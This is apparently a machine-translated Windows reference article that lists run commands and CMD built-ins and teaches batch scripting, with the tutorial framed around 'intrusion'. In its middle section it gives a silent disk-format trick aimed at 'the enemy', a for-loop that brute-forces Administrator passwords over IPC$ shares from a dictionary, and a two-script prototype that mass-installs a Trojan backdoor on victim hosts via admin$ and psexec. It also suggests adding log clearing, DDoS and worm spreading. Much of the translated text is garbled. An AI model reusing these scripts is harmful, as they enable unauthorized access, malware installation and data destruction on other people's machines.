Winver---------Check Windows version wmimgmt.msc----open Windows Management architecture wupdmgr--------Windows Update winver---------Check the Windows version Wmimgmt.msc----open Windows Management architecture wupdmgr--------Windows Update WScript--------Windows Script Host Settings Write----------WordPad winmsd-----System Information wiaacmgr-------Scanner and Camera Wizard winchat--------xp own LAN chat Mem.exe--------Show memory usage Msconfig.exe---System Configuration Utility mplayer2-------Easy widnows Media Player mspaint--------drawing board mstsc----------Remote Desktop Connection Mplayer2-------Media Player magnify--------Magnifier utility MMC------------Open the console mobsync--------Sync command dxdiag---------check DirectX information DRWTSN32------System Doctor devmgmt.msc---Device Manager dfrg.msc-------Disk Defragmenter diskmgmt.msc---Disk Management utility DCOMCNFG-------Open System Component Services DdeShare-------turn on DDE sharing settings Dvdplay--------DVD player net stop Messenger-----Stop messenger Service net start Messenger----Start Messenger Service Notepad--------Open Notepad nslookup-------Network Management tool Wizard Ntbackup-------system backup and restore narrator-------screen narrator ntmsmgr.msc----Mobile Storage Manager Ntmsoprq.msc---The Mobile Storage Administrator action Request Netstat-an----(TC) command to check the interface Syncapp--------Create a Briefcase sysedit--------System Configuration Editor Sigverif-------File Signature Validator sndrec32-------Recorder SHRPUBW--------Create a shared folder secpol.msc-----Local Security Policy SYSKEY---------system encryption, and once encryption cannot be undone, protect the dual password of Windows XP system Services.msc---Local Service settings Sndvol32-------Volume Control program sfc.exe--------System File Checker sfc/scannow---Windows File Protection TSSHUTDN-------60-second Countdown shutdown command tourstart------XP profile (roaming XP programs that appear after installation is complete) Taskmgr--------Task Manager eventvwr-------Event Viewer Eudcedit-------Font-character Program Explorer-------Open Explorer Packager-------Object Packager perfmon.msc----computer performance monitoring Program ProgMan--------Program Manager Regedit.exe----Registry Rsop.msc-------Group Policy result set regedt32-------Registry Editor rononce-p----15 seconds shutdown regsvr32/u *.dll----Stop DLL files from running regsvr32/u zipfldr.dll------Cancel zip support cmd.exe--------cmd command prompt chkdsk.exe-----chkdsk disk Check certmgr.msc----Certificate Management Utility Calc-----------Start Calculator charmap--------start character mapping table cliconfg-------SQL SERVER Client Network Utility CLIPBRD--------Clipboard Viewer Conf-----------start NetMeeting compmgmt.msc---Computer Management cleanmgr-------* * Organize ciadv.msc------Indexing Service Osk------------Open on-Screen keyboard ODBCAD32-------ODBC Data Source Administrator oobe/msoobe/a----Check if XP activates lusrmgr.msc----native users and Groups logoff---------logoff command IExpress-------Trojan Bundle tool, System comes with Nslookup-------IP address detector fsmgmt.msc-----shared Folder Manager Utilman--------Utility Manager gpedit.msc-----Group Policy
----------------------------------------------------------------------------- ---------------------------------- -------------------------------------------1.Echo Command
Turn on echo or turn off the request Echo feature, or display a message. If there are no parameters, the echo command displays the current echo setting.
Grammar
echo [{On|off}] [message]
Sample:echo Off/echo Hello World
In practical applications we will combine this command with a redirect symbol (also known as a pipe symbol, commonly used with > >> ^) to enter some commands into a file of a particular format. This will be reflected in a later example.
[Email protected] command
Indicates that the command after the @ is not displayed, and in the intrusion process (for example, using batches to format the enemy's hard disk), it is not natural to let the other party see the command you are using.
Sample: @echo off
@echo now initializing the program,please wait a minite ...
@format X:/q/u/autoset (Format This command is not allowed to use/y This parameter, it is gratifying that Microsoft left a autoset This parameter to us, the effect and/y is the same. )
3.Goto command
Specifies to jump to the label, and when the label is found, the program processes the command starting from the next line.
Syntax: Goto label (label is a parameter that specifies the line in the batch program to which you want to turn.) )
Sample:
if {%1}=={} goto noparms
if {%2}=={} goto noparms (if,% 1,%2 if you do not understand it, skip it first and there will be a detailed explanation later.) )
@Rem check parameters if NULL show usage
: noparms
echo Usage:monitor.bat ServerIP portnumber
Goto END
The name of the tag can be random, but it is better to have a meaningful letter, the letter is added: to indicate that the letter is a label, the Goto command is based on this: to find the next jump to go there. It's better to have some instructions so that you can look at your intentions.
4.Rem command
Note Command, in C language equivalent to/*--------* *, it will not be executed, just a comment on the role, easy for others to read and your own later modification.
Rem Message
Sample: @Rem Here is the description.
5.Pause command
When you run the Pause command, the following message is displayed:
Press any key to continue ...
Sample:
@echo off
: Begin
Copy a:*.* D:\back
Echo, put a new disk into driver a
Pause
Goto BEGIN
In this example, all the files on the disk in drive A are copied to D:\back. The comment that appears prompts you to put another disk in drive A, and the pause command suspends the program so that you can replace the disk and press any key to continue processing.
6.Call command
Another batch program is called from one batch program, and the parent batch program is not terminated. The call command accepts the label that is used as the calling target. If you use call outside of a script or batch file, it will not work at the command line.
Grammar
call [[Drive:][path] FileName [batchparameters]] [: Label [arguments]]
Parameters
[Drive:} [Path] FileName
Specifies the location and name of the batch program to invoke. The filename parameter must have a. bat or. cmd extension.
7.start command
Calling an external program, all DOS commands and command-line programs can be called by the start command.
Common parameters of intrusion:
Min Start window minimized
Separate start 16-bit Windows programs in separate spaces
High starts the application in the high priority category
REALTIME starting the application in the REALTIME priority category
Wait to start the application and wait for it to end
Parameters these parameters for transmission to the command/program
The application that executes is a 32-bit GUI application when CMD. EXE returns a command prompt without waiting for the application to terminate. If executed within a command script, the new behavior does not occur.
8.choice command
Choice Use this command to let the user enter a character to run different commands. Use should be Plus/C: parameters, C: After the prompt should be written to enter the characters, no spaces between. It has a return code of 1234 ...
such as: Choice/c:dme defrag,mem,end
will display
Defrag,mem,end[d,m,e]?
Sample:
The contents of Sample.bat are as follows:
@echo off
Choice/c:dme Defrag,mem,end
if errorlevel 3 goto defrag (the highest number of error codes should be judged first)
if errorlevel 2 goto MEM
If Errotlevel 1 goto end
:d Efrag
C:\dos\defrag
Goto END
: Mem
Mem
Goto END
: End
echo Good bye
When this file runs, Defrag,mem,end[d,m,e] is displayed? The user can select D m e, then the IF statement will be judged, D represents the execution of a program segment labeled Defrag, M represents the execution of a program segment labeled Mem, E represents the execution of a program segment labeled End, and each segment ends with a goto end to jump the program to the end label. Then the program will show good Bye, the end of the file.
9.If command
The IF indicates that the specified conditions will be judged, thus deciding to execute different commands. There are three types of formats:
1, if "parameter" = = "string" command to be executed
If the argument equals the specified string, the condition is set, run the command, or run the next sentence. (note is two equals)
If "%1" = = "A" format a:
if {%1}=={} goto noparms
if {%2}=={} goto noparms
2. If exist filename to execute command
If there is a specified file, then the condition is established, run the command, otherwise run the next sentence.
such as if exist Config.sys edit Config.sys
3. If errorlevel/if not errorlevel number of commands to be executed
If the return code equals the specified number, the condition is set up, run the command, or run the next sentence.
if errorlevel 2 goto x2
DOS programs will return a number to DOS, called the error code ERRORLEVEL or return code, the common return code is 0, 1.
10.for command
The for command is a more complex command that is used primarily for parameters that loop through commands within a specified range.
When using the for command in a batch file, specify the variable using the%%variable
for {%variable|%%variable} in (set) do command [CommandLineOptions]
%variable specifies a single-letter replaceable parameter.
(set) specifies one or a set of files. Wildcard characters can be used.
command specifies the commands to execute on each file.
Command-parameters specify parameters or command-line switches for specific commands.
When using the for command in a batch file, specify the variable using the%%variable
And don't use%variable. Variable names are case-sensitive, so%i differs from%i
If the command extension is enabled, the following additional for command formats are
Support:
FOR/D%variable in (set) do command [Command-parameters]
If a wildcard is included in the set, the specified match to the directory name and not to the file
Name matches.
FOR/R [[Drive:]path]%variable in (set) do command [command-
Check the directory tree with [Drive:]path Root], pointing to each directory
For statement. If no directory is specified after/R, use the current
Directory. If the set is only a single point (.) character, the directory tree is enumerated.
FOR/L%variable in (start,step,end) do command [Command-para
The set represents a sequence of numbers in increments from start to finish.
Therefore, (1,1,5) will produce sequence 1 2 3 4 5, (5,-1,1) will produce
Sequence (5 4 3 2 1).
for/f ["Options"]%variable in (file-set) do command
for/f ["Options"]%variable in ("string") do command
for/f ["Options"]%variable in (command) do command
Or, if you have the USEBACKQ option:
for/f ["Options"]%variable in (file-set) do command
for/f ["Options"]%variable in ("string") do command
for/f ["Options"]%variable in (command) do command
FileNameSet is one or more file names. Continue to the filenameset.
Before the next file, each file has been opened, read, and processed.
Processing involves reading a file, dividing it into lines of text, and then each line
Parse to 0 or more symbols. Then use the found symbol string variable value
Call the For loop. By default,/F is separated by each line in each file
The first blank symbol. Skips a blank line. You can specify an optional "options" by specifying
Parameter overrides the default resolution operation. This quoted string consists of one or more
Specifies the keywords for the different parsing options. These keywords are:
Eol=c-refers to the end of a line comment character (just one)
Skip=n-refers to the number of rows that are ignored at the beginning of the file.
Delims=xxx-refers to the delimiter set. This replaces the space and the jump bar
The default delimiter set.
Tokens=x,y,m-n-Indicates which symbol per line is passed to each iteration
For itself. This causes the extra variable name to be
The format is a range. Specify m with the nth symbol
The last character in the symbol string, the asterisk number,
Then the additional variables will be parsed at the last symbol
Assigns and accepts the retained text of a row.
USEBACKQ-Specifies that the new syntax is used in the following class situation:
A string that executes a post quote as a command and
The quotation mark character is a literal string command and allows the fi
Use double quotation marks to expand the file name.
Sample1:
For/f "eol=; tokens=2,3* delims=, "%i in (myfile.txt) do command
Each row in the myfile.txt is parsed, ignoring those lines that begin with a semicolon,
The second and third symbols in each row are passed to the for program body, with commas and/or
Space-bound symbol. Note that the statement for the body of the For program references%i to
Get the second symbol, reference%j to get a third symbol, reference%k
To get all the remaining symbols after the third symbol. For files with spaces
Name, you need to enclose the file name in double quotation marks. In order to use this method to make
With double quotes, you also need to use the USEBACKQ option, otherwise, double quotes will
is understood to be used to define a string to parse.
%i is specifically described in the For statement,%j and%k are provided by
The tokens= options are specifically described. You can tokens= a line by
Specify a maximum of 26 symbols, as long as you do not attempt to describe a higher than the letter Z or
Z's variable. Keep in mind that the for variable is single-letter, case-sensitive, and global;
At the same time not more than 52 are in use.
You can also use for/f parsing logic on adjacent strings, by
Enclose the filenameset between parentheses in single quotation marks. This way, the character
The string is treated as a single input line in a file.
Finally, you can use the for/f command to parse the output of the command. The method is to
The filenameset between parentheses becomes an anti-enclosing string. The string is
is treated as a command line, passed to a sub-CMD. EXE, its output will be caught in
Memory and is parsed as a file. Therefore, the following example:
for/f "Usebackq delims=="%i in (' Set ') do @echo%i
Enumerates the environment variable names in the current environment.
In addition, the substitution of the for variable reference has been enhanced. You can now use the following
Option syntax:
~i-Remove any quotation marks ("), expand%I
%~fi-Will%I Extend to a fully qualified path name
%~di-will only%I Extend to a drive letter
%~PI-will only%I Extend to a path
%~ni-will only%I Extend to a file name
%~xi-will only%I Expand to a file name extension
%~si-The expanded path contains only short names
%~ai-Will%I File attributes to expand to a file
%~ti-Will%I Date/time of extension to file
%~zi-Will%I Expand to File Size
%~ $PATH: I-Find the directory that is listed in the PATH environment variable and%I Expand
To the first fully qualified name found. If the environment variable
is not defined, or the file is not found, this key combination expands
Empty string
You can combine modifiers to get multiple results:
%~DPI-will only%I Expand to a drive letter and path
%~nxi-will only%I Expand to a file name and extension
%~FSI-will only%I Extend to a full pathname with a short name
%~DP$PATH:I-finds the directory that is listed in the PATH environment variable and will%I Expand
To the first drive letter and path found.
%~ftzai-Will%I Extended to DIR with similar output line
In the above example,%I And PATH can be replaced by other valid values. %~ syntax
Terminates with a valid for variable name. Choose similar%I The uppercase variable name
Easier to read and avoid confusion with key combinations that are not case-sensitive.
The above is the official help of MS, let us give a few examples to specify the purpose of the for command in the intrusion.
Sample2:
Use the for command to implement brute-force password cracking on a target Win2K host.
We used net use \\ip\ipc$ "password"/u: "Administrator" to try to connect to the target host and write down the password when it succeeds.
The main command is a: for/f i% in (dict.txt) does net use \\ip\ipc$ "i%"/U: "Administrator"
Use i% to represent the password of the admin, in Dict.txt this takes the value of i% with the net use command to connect. Then pass the program run result to the Find command--
for/f i%% in (dict.txt) does net use \\ip\ipc$ "i%%"/U: "Administrator" |find ": Command completed successfully" >>d:\ok.txt, so KO.
Sample3:
Have you ever had a large number of chickens waiting for you to plant a backdoor + Trojan? When the number is particularly high, one thing that would have been very happy would become very depressing:). The article begins with the use of batch files, which simplifies routine or repetitive tasks. So how to achieve it? Oh, look down you will understand.
The primary command also has only one: (When using the for command in a batch file, the specified variable uses%%variable)
@for/F "tokens=1,2,3 delims="%%i in (victim.txt) does start call Door.bat%%i%%j%%k
Tokens is used in the sample1 above, where it means to pass the contents of Victim.txt in order to the parameters in Door.bat%i%j.
And Cultivate.bat is nothing more than using net USE command to establish ipc$ connection, and copy Trojan + backdoor to victim, and then use the return code (If errorlever =) to filter the host successfully planted back door, and echo out, or echo to the specified file.
Delims= indicates that the content in the vivtim.txt is delimited by a space. I want to see here you must understand what the content of this victim.txt is. It should be arranged according to the objects represented by%%i%%j%%k, which is usually IP password username.
Code prototype:
---------------cut here and Save as a batchfile (I call it main.bat)--------------------
@echo off
@if "%1" = = "" Goto usage
@for/F "tokens=1,2,3 delims="%%i in (victim.txt) does start call Ipchack.bat%%i%%j%%k
@goto End
: Usage
@echo run this batch in DOS modle.or just double-click it.
: End
---------------cut here and Save as a batchfile (I call it main.bat)--------------------
-------------------cut here and Save as a batchfile (I call it door.bat)-----------------
@net use \\%1\ipc$%3/u: "%2"
@if errorlevel 1 goto failed
The @echo Trying to establish the ipc$ connection ..... Ok
@copy windrv32.exe\\%1\admin$\system32 && if not errorlevel 1 echo IP%1 USER%2 PWD%3 >>ko.txt
@p***ec \\%1 C:\winnt\system32\windrv32.exe
@p***ec \\%1 net start windrv32 && if not errorlevel 1 echo%1 backdoored >>ko.txt
: Failed
@echo Sorry can not connected to the victim.
-----------------cut here and Save as a batchfile (I call it door.bat)-------------------
This is just a prototype of the automatic Plantation backdoor batch, with two batches and backdoors (Windrv32.exe), PSexec.exe need to be placed in the Unified directory. Batch Content
Can be extended, for example: Add the ability to clear the log +ddos, add the function of the time adding users, a bit more in order to have automatic propagation function (worm). There is not much to do here, interested friends can study on their own.
For more information about a command, type the help command name
Xp. CMD command Daquan
For more information about a command, type the help command name
ASSOC Displays or modifies file name extension associations.
At Schedules commands and programs to run on the computer.
ATTRIB Display or change file properties.
Break sets or clears the extended CTRL + C check.
CACLS displays or modifies the file's access control List (ACLs).
Call calls this one from another batch program.
The CD displays the name of the current directory or changes it.
CHCP Displays or sets the number of active code pages.
CHDIR displays the name of the current directory or changes it.
CHKDSK checks the disk and displays the status report.
CHKNTFS Displays or modifies the startup time disk check.
CLS clears the screen.
CMD opens another Windows command interpreter window.
Color sets the default console foreground and background color.
COMP compares the contents of two or two sets of files.
Compact displays or changes the compression of files on NTFS partitions.
Convert converts a FAT volume to NTFS. You cannot convert
The current drive.
Copy copies at least one of the files to another location.
Date Displays or sets dates.
DEL deletes at least one file.
DIR displays the files and subdirectories in a directory.
DISKCOMP compares the contents of two floppy disks.
DISKCOPY Copy the contents of one floppy disk to another.
DOSKEY Edit the command line, invoke the Windows command, and create a macro.
echo Displays the message, or turns the command back on or off.
Endlocal to end localization of environment changes in batch files.
ERASE Delete at least one file.
Exit CMD. EXE Program (command interpreter).
FC compares two or two sets of files and displays
Different places.
Find searches the file for a text string.
FINDSTR searches for strings in the file.
For each file in a set of files, run a specified command.
Format formats the disk for use with Windows.
FTYPE displays or modifies the file types used for file name extension associations.
GOTO to point the Windows command interpreter to a batch program
One of the indicated rows in the
GRAFTABL enable Windows to display in image mode
Extended character Set.
Help provides information about Windows commands.
IF you perform conditional processing in a batch program.
Label creates, changes, or deletes a disk's volume label.
MD to create a directory.
MKDIR Create a directory.
MODE configures the system device.
More displays a result screen at a time.
Move moves files from one directory to another.
Path displays or sets the search path for the executable file.
Pause pauses processing of batch files and displays messages.
POPD restores the previous value of the current directory saved by PUSHD.
Print prints a text file.
PROMPT change the Windows command prompt.
PUSHD Save the current directory and make changes to it.
RD Delete directory.
RECOVER recovers readable information from the problematic disk.
REM record batch file or CONFIG. The comment in SYS.
REN renames the file.
RENAME Rename the file.
Replace replaces the file.
RMDIR Delete the directory.
Set to display, set, or remove Windows environment variables.
SETLOCAL the localization of the environment changes in the batch file.
SHIFT replaces the position of replaceable parameters in the batch file.
Sort to categorize the input.
Start starts another window to run the specified program or command.
SUBST associates the path with a drive letter.
Time displays or sets the system times.
The TITLE sets CMD. The window caption of the EXE session.
Tree displays the directory structure of a drive or path in graphical mode.
TYPE Displays the contents of the text file.
VER shows the version of Windows.
VERIFY tell Windows whether to verify that the file is correct
Write to disk.
VOL Displays the disk volume label and serial number.
XCOPY copies files and directory trees.
Appwiz.cpl------------Add a Remove program
Control userpasswords2--------User account Settings
cleanmgr-------Waste Finishing
The CMD--------------command prompt can be thought of as an attachment to Windows that ping,convert these features that cannot be used in a graphical environment.
CMD------jview View the Java Virtual Machine version.
Command.com------Call is the system built-in NTVDM, a DOS virtual machine. It is completely a virtual PC-like environment, and the system itself is not very connected. When we run a DOS program at the command prompt, it is actually automatically transferred to the NTVDM virtual machine, which has nothing to do with the CMD itself.
Calc-----------Start Calculator
Chkdsk.exe-----CHKDSK disk Check
Compmgmt.msc---Computer Management
Conf-----------start NetMeeting
Control USERPASSWORDS2-----User account permission settings
Devmgmt.msc---Device Manager
Diskmgmt.msc---Disk Management utility
Dfrg.msc-------Disk Defragmenter
DRWTSN32------System Doctor
Dvdplay--------Start Media Player
DxDiag-----------DirectX Diagnostic Tool
gpedit.msc-------Group Policy Editor
Gpupdate/target:computer/force Force Refresh Group Policy
Eventvwr.exe-----Event Viewer
Explorer-------Open Resource Manager
Logoff---------Logoff command
Lusrmgr.msc----native Users and Groups
Msinfo32---------System Information
Msconfig---------System Configuration Utility
net start (servicename)----start the service
net stop (servicename)-----Stop the Service
Notepad--------Open Notepad
Nusrmgr.cpl-------with Control userpasswords, open the user Account Control Panel
Nslookup-------IP Address detector
oobe/msoobe/a----Check if XP is active
PERFMON.MSC----Computer Performance monitoring Program
ProgMan--------Program Manager
Regedit----------Registry Editor
Regedt32-------Registry Editor
regsvr32/u *.dll----Stop DLL file to run
Route print------View the routing table
Rononce-p----15-second shutdown
Rsop.msc-------Group Policy result set
rundll32.exe rundll32.exe%systemroot%system32shimgvw.dll,imageview_fullscreen----Start a blank Windows Picture and Fax Viewer
Secpol.msc--------Local Security Policy
Services.msc---Local Service settings
Sfc/scannow-----Boot System File Checker
SNDREC32-------Recorder
Taskmgr-----Task Manager (for 2000/xp/2003)
TSSHUTDN-------60-second Countdown shutdown command
Winchat--------XP comes with LAN chat
WINMSD---------System Information
Winver-----Show about Windows wupdmgr-----------Windows Update